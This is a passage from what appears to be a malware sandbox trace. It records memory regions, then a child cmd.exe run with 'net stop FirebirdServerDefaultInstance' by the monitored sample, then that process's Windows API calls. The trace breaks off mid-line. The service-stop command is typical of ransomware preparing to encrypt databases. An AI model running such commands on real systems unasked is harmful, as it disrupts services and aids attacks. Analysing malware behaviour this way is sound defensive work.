5420 start_va = 0x4780000 end_va = 0x4783fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 5421 start_va = 0x4790000 end_va = 0x4790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 5422 start_va = 0x47a0000 end_va = 0x47a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047a0000" filename = "" Region: id = 5423 start_va = 0x47e0000 end_va = 0x48befff entry_point = 0x47e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5424 start_va = 0x4b40000 end_va = 0x4cc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 5425 start_va = 0x4cd0000 end_va = 0x4e50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 5426 start_va = 0x4e60000 end_va = 0x625ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 5427 start_va = 0x6260000 end_va = 0x6596fff entry_point = 0x6260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5428 start_va = 0x74860000 end_va = 0x748c5fff entry_point = 0x74860000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5429 start_va = 0x748d0000 end_va = 0x748dcfff entry_point = 0x748d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5430 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5431 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5432 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5433 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5434 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5435 start_va = 0x74810000 end_va = 0x74853fff entry_point = 0x74810000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Thread: id = 350 os_tid = 0xd20 Thread: id = 351 os_tid = 0xd5c Process: id = "85" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3cbc6000" os_pid = "0x300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop FirebirdServerDefaultInstance" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5436 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5437 start_va = 0xfe0000 end_va = 0x4fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 5438 start_va = 0x4fe0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 5439 start_va = 0x5000000 end_va = 0x5000fff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 5440 start_va = 0x5010000 end_va = 0x5023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 5441 start_va = 0x5030000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 5442 start_va = 0x5070000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 5443 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5444 start_va = 0x7e400000 end_va = 0x7e422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e400000" filename = "" Region: id = 5445 start_va = 0x7e42b000 end_va = 0x7e42dfff entry_point = 0x0 region_type = private name = "private_0x000000007e42b000" filename = "" Region: id = 5446 start_va = 0x7e42e000 end_va = 0x7e42efff entry_point = 0x0 region_type = private name = "private_0x000000007e42e000" filename = "" Region: id = 5447 start_va = 0x7e42f000 end_va = 0x7e42ffff entry_point = 0x0 region_type = private name = "private_0x000000007e42f000" filename = "" Region: id = 5448 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5449 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5450 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5451 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5452 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5453 start_va = 0x5170000 end_va = 0x5173fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005170000" filename = "" Region: id = 5454 start_va = 0x5180000 end_va = 0x5180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 5455 start_va = 0x5190000 end_va = 0x5191fff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 5456 start_va = 0x5390000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 5457 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5458 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5459 start_va = 0x51d0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 5460 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5501 start_va = 0x4fe0000 end_va = 0x4feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fe0000" filename = "" Region: id = 5502 start_va = 0x52d0000 end_va = 0x538dfff entry_point = 0x52d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5503 start_va = 0x53a0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 5504 start_va = 0x53e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 5505 start_va = 0x5620000 end_va = 0x562ffff entry_point = 0x0 region_type = private name = "private_0x0000000005620000" filename = "" Region: id = 5506 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5507 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5508 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5509 start_va = 0x7e300000 end_va = 0x7e3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e300000" filename = "" Region: id = 5510 start_va = 0x7e428000 end_va = 0x7e42afff entry_point = 0x0 region_type = private name = "private_0x000000007e428000" filename = "" Region: id = 5511 start_va = 0x4ff0000 end_va = 0x4ff3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 5512 start_va = 0x5000000 end_va = 0x5003fff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 5513 start_va = 0x5630000 end_va = 0x5966fff entry_point = 0x5630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 352 os_tid = 0xb4c [0125.790] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0125.790] __set_app_type (_Type=0x1) [0125.790] __p__fmode () returned 0x77ac4d6c [0125.790] __p__commode () returned 0x77ac5b1c [0125.790] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0125.790] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0125.790] GetCurrentThreadId () returned 0xb4c [0125.790] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb4c) returned 0x84 [0125.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0125.791] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0125.791] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.793] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.793] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x516fc64 | out: phkResult=0x516fc64*=0x0) returned 0x2 [0125.793] VirtualQuery (in: lpAddress=0x516fc6b, lpBuffer=0x516fc1c, dwLength=0x1c | out: lpBuffer=0x516fc1c*(BaseAddress=0x516f000, AllocationBase=0x5070000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.793] VirtualQuery (in: lpAddress=0x5070000, lpBuffer=0x516fc1c, dwLength=0x1c | out: lpBuffer=0x516fc1c*(BaseAddress=0x5070000, AllocationBase=0x5070000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0125.793] VirtualQuery (in: lpAddress=0x5071000, lpBuffer=0x516fc1c, dwLength=0x1c | out: lpBuffer=0x516fc1c*(BaseAddress=0x5071000, AllocationBase=0x5070000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0125.793] VirtualQuery (in: lpAddress=0x5073000, lpBuffer=0x516fc1c, dwLength=0x1c | out: lpBuffer=0x516fc1c*(BaseAddress=0x5073000, AllocationBase=0x5070000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.793] VirtualQuery (in: lpAddress=0x5170000, lpBuffer=0x516fc1c, dwLength=0x1c | out: lpBuffer=0x516fc1c*(BaseAddress=0x5170000, AllocationBase=0x5170000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0125.793] GetConsoleOutputCP () returned 0x1b5 [0125.793] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.794] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0125.794] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.794] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0125.794] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.794] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0125.794] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.794] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0125.794] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.794] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0125.794] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.794] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0125.795] GetEnvironmentStringsW () returned 0x51d7d90* [0125.795] FreeEnvironmentStringsA (penv="A") returned 1 [0125.795] GetEnvironmentStringsW () returned 0x51d7d90* [0125.795] FreeEnvironmentStringsA (penv="A") returned 1 [0125.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x516ebc8 | out: phkResult=0x516ebc8*=0x94) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0xcc, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x1, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0x1, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x0, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x40, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x40, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0x40, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.795] RegCloseKey (hKey=0x94) returned 0x0 [0125.795] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x516ebc8 | out: phkResult=0x516ebc8*=0x94) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0x40, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x1, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0x1, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x0, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x9, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x4, lpData=0x516ebd4*=0x9, lpcbData=0x516ebd0*=0x4) returned 0x0 [0125.795] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x516ebcc, lpData=0x516ebd4, lpcbData=0x516ebd0*=0x1000 | out: lpType=0x516ebcc*=0x0, lpData=0x516ebd4*=0x9, lpcbData=0x516ebd0*=0x1000) returned 0x2 [0125.796] RegCloseKey (hKey=0x94) returned 0x0 [0125.796] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982e [0125.796] srand (_Seed=0x5ad2982e) [0125.796] GetCommandLineW () returned="/c net stop FirebirdServerDefaultInstance" [0125.796] GetCommandLineW () returned="/c net stop FirebirdServerDefaultInstance" [0125.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.796] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x51d9ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0125.796] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0125.796] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.796] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.796] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.796] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.796] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.796] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.796] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.796] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.796] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.796] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.796] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.796] GetEnvironmentStringsW () returned 0x51d7d90* [0125.796] FreeEnvironmentStringsA (penv="A") returned 1 [0125.796] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.796] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.796] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.796] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.796] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0125.796] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.796] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.797] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.797] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.797] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.797] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x516f9a0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.797] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x516f9a0, lpFilePart=0x516f998 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x516f998*="Desktop") returned 0x1d [0125.797] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0125.797] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x516f720 | out: lpFindFileData=0x516f720) returned 0x51d05c8 [0125.797] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0125.797] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x516f720 | out: lpFindFileData=0x516f720) returned 0x51d05c8 [0125.797] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0125.797] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0125.797] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x516f720 | out: lpFindFileData=0x516f720) returned 0x51d05c8 [0125.797] FindClose (in: hFindFile=0x51d05c8 | out: hFindFile=0x51d05c8) returned 1 [0125.797] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0125.798] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0125.798] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0125.798] GetEnvironmentStringsW () returned 0x51d7d90* [0125.798] FreeEnvironmentStringsA (penv="=") returned 1 [0125.798] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0125.798] GetConsoleOutputCP () returned 0x1b5 [0125.798] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.798] GetUserDefaultLCID () returned 0x409 [0125.798] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x516fad0, cchData=128 | out: lpLCData="0") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x516fad0, cchData=128 | out: lpLCData="0") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x516fad0, cchData=128 | out: lpLCData="1") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0125.799] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0125.799] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.800] GetConsoleTitleW (in: lpConsoleTitle=0x51daa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.800] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0125.800] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0125.800] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0125.800] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0125.801] _wcsicmp (_String1="net", _String2=")") returned 69 [0125.801] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0125.801] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0125.801] _wcsicmp (_String1="IF", _String2="net") returned -5 [0125.801] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0125.801] _wcsicmp (_String1="REM", _String2="net") returned 4 [0125.801] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0125.802] GetConsoleTitleW (in: lpConsoleTitle=0x516f7b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.802] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0125.802] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0125.802] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0125.802] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0125.802] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0125.802] _wcsicmp (_String1="net", _String2="CD") returned 11 [0125.802] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0125.802] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0125.802] _wcsicmp (_String1="net", _String2="REN") returned -4 [0125.802] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0125.802] 